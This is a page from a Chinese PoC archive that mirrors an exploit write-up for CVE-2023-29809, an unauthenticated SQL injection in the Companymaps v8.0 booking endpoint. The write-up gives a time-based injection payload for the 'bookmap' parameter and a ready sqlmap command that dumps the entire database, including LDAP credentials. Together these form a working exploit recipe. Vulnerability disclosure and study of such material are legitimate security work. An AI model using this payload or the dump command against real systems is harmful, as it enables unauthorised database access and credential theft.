POC详情: 3123e2dc89dfc542b3ca975f68659d0b57eb59ba

来源
https://github.com/zPrototype/CVE-2023-29809
关联漏洞
标题: Companymaps SQL注入漏洞 (CVE-2023-29809)
描述:Companymaps是Maximilian Vogt个人开发者的一个显示包含所有办公桌和员工的公司地图。 Companymaps v8.0版本存在安全漏洞。攻击者利用该漏洞执行SQL注入攻击。
介绍
# Exploit Title: Unauthenticated SQL injection
- Google Dork:
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: 
```
'-(select*from(select+sleep(2)+from+dual)a)--+
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
   ```shell
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
   ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.



## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
文件快照

 [4.0K]  /data/pocs/3123e2dc89dfc542b3ca975f68659d0b57eb59ba
├── [2.0K]  README.md
├── [152K]  Screenshot 2023-04-30 at 22.23.51.png
└── [190K]  Screenshot 2023-04-30 at 22.24.35.png

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。